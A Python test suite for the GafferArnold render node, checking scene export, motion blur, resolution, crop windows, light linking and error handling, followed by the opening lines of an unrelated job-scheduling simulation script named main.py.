self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.tif" ) )
def testExecuteWithStringSubstitutions( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.failIf( p.returncode )
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%04d.ass" % i ) )
def testImageOutput( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Display(
self.temporaryDirectory() + "/test.####.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
c = Gaffer.Context()
for i in range( 1, 4 ) :
c.setFrame( i )
with c :
s["render"]["task"].execute()
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%04d.tif" % i ) )
def testTypeNamePrefixes( self ) :
self.assertTypeNamesArePrefixed( GafferArnold )
self.assertTypeNamesArePrefixed( GafferArnoldTest )
def testDefaultNames( self ) :
self.assertDefaultNamesAreCorrect( GafferArnold )
self.assertDefaultNamesAreCorrect( GafferArnoldTest )
def testNodesConstructWithDefaultValues( self ) :
self.assertNodesConstructWithDefaultValues( GafferArnold )
self.assertNodesConstructWithDefaultValues( GafferArnoldTest )
def testDirectoryCreation( self ) :
s = Gaffer.ScriptNode()
s["variables"].addMember( "renderDirectory", self.temporaryDirectory() + "/renderTests" )
s["variables"].addMember( "assDirectory", self.temporaryDirectory() + "/assTests" )
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["outputs"].addOutput(
"beauty",
IECoreScene.Display(
"$renderDirectory/test.####.exr",
"exr",
"rgba",
{}
)
)
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["fileName"].setValue( "$assDirectory/test.####.ass" )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
# check it can cope with everything already existing
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
def testWedge( self ) :
s = Gaffer.ScriptNode()
s["sphere"] = GafferScene.Sphere()
s["sphere"]["sets"].setValue( "${wedge:value}" )
s["filter"] = GafferScene.SetFilter()
s["filter"]["setExpression"].setValue( "hidden" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["attributes"]["visibility"]["enabled"].setValue( True )
s["attributes"]["attributes"]["visibility"]["value"].setValue( False )
s["attributes"]["filter"].setInput( s["filter"]["out"] )
s["attributes"]["in"].setInput( s["sphere"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Display(
self.temporaryDirectory() + "/${wedge:value}.tif",
"tiff",
"rgba",
{
}
)
)
s["outputs"]["in"].setInput( s["attributes"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["render"]["in"].setInput( s["outputs"]["out"] )
s["wedge"] = Gaffer.Wedge()
s["wedge"]["mode"].setValue( int( s["wedge"].Mode.StringList ) )
s["wedge"]["strings"].setValue( IECore.StringVectorData( [ "visible", "hidden" ] ) )
s["wedge"]["preTasks"][0].setInput( s["render"]["task"] )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
s.save()
dispatcher = GafferDispatch.LocalDispatcher()
dispatcher["jobsDirectory"].setValue( self.temporaryDirectory() + "/testJobDirectory" )
dispatcher["framesMode"].setValue( GafferDispatch.Dispatcher.FramesMode.CurrentFrame )
dispatcher["executeInBackground"].setValue( False )
dispatcher.dispatch( [ s["wedge"] ] )
hidden = GafferImage.ImageReader()
hidden["fileName"].setValue( self.temporaryDirectory() + "/hidden.tif" )
visible = GafferImage.ImageReader()
visible["fileName"].setValue( self.temporaryDirectory() + "/visible.tif" )
hiddenStats = GafferImage.ImageStats()
hiddenStats["in"].setInput( hidden["out"] )
hiddenStats["area"].setValue( hiddenStats["in"]["dataWindow"].getValue() )
visibleStats = GafferImage.ImageStats()
visibleStats["in"].setInput( visible["out"] )
visibleStats["area"].setValue( visibleStats["in"]["dataWindow"].getValue() )
self.assertLess( hiddenStats["average"].getValue()[0], 0.05 )
self.assertGreater( visibleStats["average"].getValue()[0], .27 )
@staticmethod
def __m44f( m ) :
return imath.M44f( *[ i for row in m.data for i in row ] )
def testTransformMotion( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["sphere"] = GafferScene.Sphere()
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["plane"]["out"] )
s["group"]["in"][1].setInput( s["sphere"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression(
inspect.cleandoc(
"""
parent["plane"]["transform"]["translate"]["x"] = context.getFrame()
parent["sphere"]["transform"]["translate"]["y"] = context.getFrame() * 2
parent["group"]["transform"]["translate"]["z"] = context.getFrame() - 1
"""
)
)
s["planeFilter"] = GafferScene.PathFilter()
s["planeFilter"]["paths"].setValue( IECore.StringVectorData( [ "/group/plane" ] ) )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["group"]["out"] )
s["attributes"]["filter"].setInput( s["planeFilter"]["out"] )
s["attributes"]["attributes"]["transformBlur"]["enabled"].setValue( True )
s["attributes"]["attributes"]["transformBlur"]["value"].setValue( False )
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["attributes"]["out"] )
s["options"]["options"]["shutter"]["enabled"].setValue( True )
s["options"]["options"]["transformBlur"]["enabled"].setValue( True )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# No motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrix = arnold.AiNodeGetMatrix( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrix = arnold.AiNodeGetMatrix( plane, "matrix" )
# Motion parameters should be left at default
self.assertEqual( sphereMotionStart, 0 )
self.assertEqual( sphereMotionEnd, 1 )
self.assertEqual( planeMotionStart, 0 )
self.assertEqual( planeMotionEnd, 1 )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, 2, 0 ) )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, 0 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 1 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1 )
# Motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( True )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1.25 )
# Motion blur on, but sampleMotion off
s["options"]["options"]["sampleMotion"]["enabled"].setValue( True )
s["options"]["options"]["sampleMotion"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 0.75 )
def testResolution( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderResolution"]["enabled"].setValue( True )
s["options"]["options"]["renderResolution"]["value"].setValue( imath.V2i( 200, 100 ) )
s["options"]["options"]["resolutionMultiplier"]["enabled"].setValue( True )
s["options"]["options"]["resolutionMultiplier"]["value"].setValue( 2 )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default camera should have the right resolution.
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
# As should a camera picked from the scene.
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
def testRenderRegion( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default region
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 639 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Apply Crop Window
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( True )
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f( imath.V2f( 0.25, 0.5 ), imath.V2f( 0.75, 1.0 ) ) )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 160 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 479 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 240 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Test Empty Crop Window
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f() )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
# Since Arnold doesn't support empty regions, we default to one pixel in the corner
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 0 )
# Apply Overscan
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( False )
s["options"]["options"]["overscan"]["enabled"].setValue( True )
s["options"]["options"]["overscan"]["value"].setValue( True )
s["options"]["options"]["overscanTop"]["enabled"].setValue( True )
s["options"]["options"]["overscanTop"]["value"].setValue( 0.1 )
s["options"]["options"]["overscanBottom"]["enabled"].setValue( True )
s["options"]["options"]["overscanBottom"]["value"].setValue( 0.2 )
s["options"]["options"]["overscanLeft"]["enabled"].setValue( True )
s["options"]["options"]["overscanLeft"]["value"].setValue( 0.3 )
s["options"]["options"]["overscanRight"]["enabled"].setValue( True )
s["options"]["options"]["overscanRight"]["value"].setValue( 0.4 )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), -192 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 640 + 255 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), -96 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 480 + 47 )
def testMissingCameraRaises( self ) :
s = Gaffer.ScriptNode()
s["options"] = GafferScene.StandardOptions()
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/i/dont/exist" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# The requested camera doesn't exist - this should raise an exception.
self.assertRaisesRegexp( RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
# And even the existence of a different camera shouldn't change that.
s["camera"] = GafferScene.Camera()
s["options"]["in"].setInput( s["camera"]["out"] )
self.assertRaisesRegexp( RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
def testManyCameras( self ) :
camera = GafferScene.Camera()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( camera["out"] )
duplicate["target"].setValue( "/camera" )
duplicate["copies"].setValue( 1000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
def testTwoRenders( self ) :
sphere = GafferScene.Sphere()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( sphere["out"] )
duplicate["target"].setValue( "/sphere" )
duplicate["copies"].setValue( 10000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
errors = []
def executeFrame( frame ) :
with Gaffer.Context() as c :
c.setFrame( frame )
try :
render["task"].execute()
except Exception as e :
errors.append( str( e ) )
threads = []
for i in range( 0, 2 ) :
t = threading.Thread( target = executeFrame, args = ( i, ) )
t.start()
threads.append( t )
for t in threads :
t.join()
self.assertEqual( len( errors ), 1 )
self.assertTrue( "Arnold is already in use" in errors[0] )
def testTraceSets( self ) :
sphere = GafferScene.Sphere()
group = GafferScene.Group()
group["in"][0].setInput( sphere["out"] )
group["in"][1].setInput( sphere["out"] )
set1 = GafferScene.Set()
set1["name"].setValue( "render:firstSphere" )
set1["paths"].setValue( IECore.StringVectorData( [ "/group/sphere" ] ) )
set1["in"].setInput( group["out"] )
set2 = GafferScene.Set()
set2["name"].setValue( "render:secondSphere" )
set2["paths"].setValue( IECore.StringVectorData( [ "/group/sphere1" ] ) )
set2["in"].setInput( set1["out"] )
set3 = GafferScene.Set()
set3["name"].setValue( "render:group" )
set3["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
set3["in"].setInput( set2["out"] )
set4 = GafferScene.Set()
set4["name"].setValue( "render:bothSpheres" )
set4["paths"].setValue( IECore.StringVectorData( [ "/group/sphere", "/group/sphere1" ] ) )
set4["in"].setInput( set3["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( set4["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
firstSphere = arnold.AiNodeLookUpByName( "/group/sphere" )
secondSphere = arnold.AiNodeLookUpByName( "/group/sphere1" )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( firstSphere, "trace_sets" ) ), { "firstSphere", "group", "bothSpheres" } )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( secondSphere, "trace_sets" ) ), { "secondSphere", "group", "bothSpheres" } )
def testSetsNeedContextEntry( self ) :
script = Gaffer.ScriptNode()
script["light"] = GafferArnold.ArnoldLight()
script["light"].loadShader( "point_light" )
script["expression"] = Gaffer.Expression()
script["expression"].setExpression(
"""parent["light"]["name"] = context["lightName"]"""
)
script["render"] = GafferArnold.ArnoldRender()
script["render"]["in"].setInput( script["light"]["out"] )
script["render"]["mode"].setValue( script["render"].Mode.SceneDescriptionMode )
script["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for i in range( 0, 100 ) :
with Gaffer.Context() as context :
context["lightName"] = "light%d" % i
script["render"]["task"].execute()
def testFrameAndAASeed( self ) :
options = GafferArnold.ArnoldOptions()
render = GafferArnold.ArnoldRender()
render["in"].setInput( options["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for frame in ( 1, 2, 2.8, 3.2 ) :
for seed in ( None, 3, 4 ) :
with Gaffer.Context() as c :
c.setFrame( frame )
options["options"]["aaSeed"]["enabled"].setValue( seed is not None )
options["options"]["aaSeed"]["value"].setValue( seed or 1 )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
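# When no explicit seed is enabled, the AA seed is expected to fall back to the (rounded) frame number.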
self.assertEqual(
arnold.AiNodeGetInt( arnold.AiUniverseGetOptions(), "AA_seed" ),
seed or round( frame )
)
def testRendererContextVariable( self ) :
sphere = GafferScene.Sphere()
sphere["name"].setValue( "sphere${scene:renderer}" )
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
self.assertTrue( arnold.AiNodeLookUpByName( "/sphereArnold" ) is not None )
def testAdaptors( self ) :
sphere = GafferScene.Sphere()
def a() :
result = GafferArnold.ArnoldAttributes()
result["attributes"]["matte"]["enabled"].setValue( True )
result["attributes"]["matte"]["value"].setValue( True )
return result
GafferScene.registerAdaptor( "Test", a )
sphere = GafferScene.Sphere()
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
node = arnold.AiNodeLookUpByName( "/sphere" )
self.assertEqual( arnold.AiNodeGetBool( node, "matte" ), True )
def testLightLinking( self ) :
sphere1 = GafferScene.Sphere()
sphere2 = GafferScene.Sphere()
attributes = GafferScene.StandardAttributes()
light1 = GafferArnold.ArnoldLight()
light1.loadShader( "point_light" )
light2 = GafferArnold.ArnoldLight()
light2.loadShader( "point_light" )
group = GafferScene.Group()
group["in"].addChild( GafferScene.ScenePlug( "in1" ) )
group["in"].addChild( GafferScene.ScenePlug( "in2" ) )
group["in"].addChild( GafferScene.ScenePlug( "in3" ) )
group["in"].addChild( GafferScene.ScenePlug( "in4" ) )
evaluate = GafferScene.EvaluateLightLinks()
render = GafferArnold.ArnoldRender()
attributes["in"].setInput( sphere1["out"] )
group["in"]["in1"].setInput( attributes["out"] )
group["in"]["in2"].setInput( light1["out"] )
group["in"]["in3"].setInput( light2["out"] )
group["in"]["in4"].setInput( sphere2["out"] )
evaluate["in"].setInput( group["out"] )
render["in"].setInput( evaluate["out"] )
attributes["attributes"]["linkedLights"]["enabled"].setValue( True )
attributes["attributes"]["linkedLights"]["value"].setValue( "/group/light /group/light1" )
# make sure we pass correct data into the renderer
self.assertEqual(
set( render["in"].attributes( "/group/sphere" )["linkedLights"] ),
set( IECore.StringVectorData( ["/group/light", "/group/light1"] ) )
)
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
# the first sphere had linked lights
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
lights = arnold.AiNodeGetArray( sphere, "light_group" )
lightNames = []
for i in range( arnold.AiArrayGetNumElements( lights.contents ) ):
light = arnold.cast(arnold.AiArrayGetPtr(lights, i), arnold.POINTER(arnold.AtNode))
lightNames.append( arnold.AiNodeGetName(light.contents) )
doLinking = arnold.AiNodeGetBool( sphere, "use_light_group" )
self.assertEqual( set( lightNames ), { "light:/group/light", "light:/group/light1" } )
self.assertEqual( doLinking, True )
# the second sphere does not have any light linking enabled
sphere1 = arnold.AiNodeLookUpByName( "/group/sphere1" )
lights = arnold.AiNodeGetArray( sphere1, "light_group" )
lightNames = []
for i in range( arnold.AiArrayGetNumElements( lights.contents ) ):
light = arnold.cast(arnold.AiArrayGetPtr(lights, i), arnold.POINTER(arnold.AtNode))
lightNames.append( arnold.AiNodeGetName(light.contents) )
doLinking = arnold.AiNodeGetBool( sphere1, "use_light_group" )
self.assertEqual( lightNames, [] )
self.assertEqual( doLinking, False )
def testAbortRaises( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["plane"]["transform"]["translate"]["z"].setValue( -10 )
s["shader"] = GafferArnold.ArnoldShader()
s["shader"].loadShader( "image" )
# Missing texture should cause render to abort
s["shader"]["parameters"]["filename"].setValue( "iDontExist" )
s["filter"] = GafferScene.PathFilter()
s["filter"]["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["plane"]["out"] )
s["shaderAssignment"]["filter"].setInput( s["filter"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Display(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["shaderAssignment"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
self.assertRaisesRegexp( RuntimeError, "Render aborted", s["render"]["task"].execute )
def __arrayToSet( self, a ) :
result = set()
for i in range( 0, arnold.AiArrayGetNumElements( a.contents ) ) :
if arnold.AiArrayGetType( a.contents ) == arnold.AI_TYPE_STRING :
result.add( arnold.AiArrayGetStr( a, i ) )
else :
raise TypeError
return result
if __name__ == "__main__":
unittest.main()
|
main.py
|
import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
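# Fixed arrival order of the 50 jobs; each job's arrival time below is the cumulative sum of Poisson(30)-distributed inter-arrival gaps (in seconds).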
queue = [6, 33, 4, 43, 15, 47, 18, 42, 35, 40, 34, 20, 9, 29, 19, 22, 3, 5, 38, 7, 41, 39, 46, 17, 24, 28, 26, 45, 16, 14, 50, 48, 36, 27, 32, 8, 10, 49, 2, 12, 23, 1, 37, 31, 44, 21, 30, 11, 13, 25]
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
queue_timer = time.time()
job_start = {} #{'49': time1, '15': time2...}
JCT = {}
overhead = {} # initialize so that every job starts with 0s overhead time
for item in queue:
